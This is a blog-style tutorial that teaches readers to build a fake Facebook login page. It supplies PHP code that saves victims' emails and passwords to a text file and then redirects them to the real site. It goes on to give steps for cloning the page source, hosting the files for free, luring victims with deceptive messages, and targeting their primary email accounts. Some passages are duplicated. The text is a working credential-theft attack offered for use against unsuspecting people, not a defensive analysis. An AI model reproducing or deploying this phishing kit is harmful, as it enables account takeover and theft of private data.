In my previous post, I showed you the use of Keyloggers for Hacking someone's password. I agree that the efficiency of using suck tricks is quite less so now I would like so introduce you to a new and one of the most efficient way of hacking called 'PHISHING' .Phishing is essentially making a FAKE page which resembles to the real login page of sites like Yahoo!, Facebook,Gmail,etc. but with a modified URL(Ofcourse our's) .When someone Logins in this page, the username and password is secretly stolen away and stored in our database and the person get redirected to the real login page...so he/she doesn't even get to know that he/she has been HACKED!
For this trick you need some basic knowledge of Web-hosting and PHP.Hey! don't worry even if you don't have any knowledge of it then just follow all these steps properly and you will get to it.
The following script is for making a Fake FACEBOOK page.
STEP 1:Creating Phishing.php file :
1. Even if you don't have any knowledge of php file simply copy the following script and save it as phishing.php .
<html> <body> <?php $handle =
fopen("password.txt", "a");
fwrite($handle,$_POST["email"]);
fwrite($handle,"\n");
fwrite($handle,$_POST["pass"]);
fwrite($handle,"\n");
fwrite($handle,"\n"); fclose($handle);
header("Location:
https://www.facebook.com/login.php?
login_attempt=1"); exit; ?> </body>
</html>
STEP 2: Creating index.html page :
login_attempt=1"); exit; ?> </body>
</html>
STEP 2: Creating index.html page :
2.1 Open the Facebook login page then, Right click>View page source and paste it in notepad and save it as
index.html .
2.2 Open that index.html file with a Notepad and search (By pressing Ctrl+F) for :action in it and replace the highlighted part (as in the following screenshot) withphishing.php .
STEP 3: Now create a completely blank text file with name password.txt.
Now you have all the following three files with you :
1. phishing.php
2. index.html
3. password.txt
If you don't have your own web hosting account, goto any free web-hosting site www.phpzilla.net ,and in file manager, upload all the three files.
Your fake page is now ready! With the Domain Name you registered on the Web-hosting site ask anyone to login and then check your password.txt file .You will find the Username and Password of that person stored in it.Also the person gets redirected to the original Facebook login page and he/she thinks that there must be some problem or he/she may have entered wrong Username or Password.
Though this method of hacking looks quite long yet, once you have created the fake page then you don't need to have anyone login on your computer .Just send that URL to anyone saying 'Hey! Join my page on Facebook!' or whatever and after he logins you will have his/her password.
But the problem Facebook phishing has is, even if you get someone's Facebook password and change it, the person is notified by an email and he/she will get to know that someone is trying to access his/her password and will definitely change it :( . So, its better to directly hack their primary account to gain complete access to the victims account ;)
But the problem Facebook phishing has is, even if you get someone's Facebook password and change it, the person is notified by an email and he/she will get to know that someone is trying to access his/her password and will definitely change it :( . So, its better to directly hack their primary account to gain complete access to the victims account ;)
